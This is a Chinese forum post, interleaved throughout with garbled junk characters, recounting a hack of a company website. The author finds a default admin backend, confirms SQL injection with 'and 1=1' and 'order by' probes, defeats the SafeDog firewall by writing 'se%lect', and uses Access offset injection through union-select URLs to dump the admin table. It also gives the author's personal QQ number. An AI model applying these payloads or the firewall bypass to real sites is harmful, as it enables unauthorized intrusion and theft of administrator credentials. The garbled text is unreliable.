打开网站,一个企业站。* w9 @3 @2 D; _4 F+ O1 I$ r
9 F* `% d. r( R! _! r0 }9 \
' |& x% b% N" a) B. s; p顺手加个admin) f5 W/ n* _+ B. O% H
: E% ] j u. c! |- o& D
. F; F+ v, F, m/ d, G) {4 r默认后台。
' \7 l7 m$ Q: L$ i' O- U. M回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。7 L' U4 `' s) l1 O( \; P
( }! \2 l, C# U5 E, O
* U" ~+ X# _0 V( {, l# o) M+ C
1 |. J {9 ]3 v+ q% u) \7 j! x4 x, C所以就不用御剑扫了,待会直接封IP。
: u0 b7 u! g6 H; f
3 z2 P+ B. i( [+ D3 \: V/ _5 @用order by语句判断是否存在注入。7 v1 J& j/ @. Z. j
http://www.xxx.com /product_show.asp?id=997 order by 1' p) ?7 s2 S5 `/ i9 j
http://www.xxx.com /product_show.asp?id=997 order by 100/ }* S6 @: j' F) H: y9 W4 C: L
现在存在注入,经测试后发现是9个字段。
/ j/ j' I3 [1 b' C. u' X, m
" X7 }6 k) H T' A; k接下来进行联合查询,猜是否存在admin表。& G1 b, v! _& c0 K# ?- U
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。0 E% Z- X2 \1 m
2 \+ H! @' Y+ m5 Q0 I9 `$ m" u% C* s! c
# o8 k2 i" C" r/ w9 }+ j, I z在select中间加个%,se%lect绕过安全狗。- G3 H& w* ]- K/ m6 C
/ H; g' G u E7 G
9 K/ }8 e7 V' Z; F5 K# a' a
发现存在admin表,然后开始手工猜常用的字段。
- _- Y2 U3 |6 C8 Z纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。+ f! |' S# G3 I2 R+ C- O
0 L' a" i/ {- \* z" o4 j. O突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。! P, }2 c& t. v: u# v4 h
1 P) @. Q" l1 G4 R
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
: G9 v$ g" T; h2 h) O0 S0 Zhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
% _- X F8 `5 k, A! H好了,敏感内容出显了。0 s/ F) [0 o% A: B4 H7 m' }4 W
! ^; c. c5 j0 p, Z% e+ C
! [; R; ^* _7 E; r) r8 V$ c: d3 M: r
|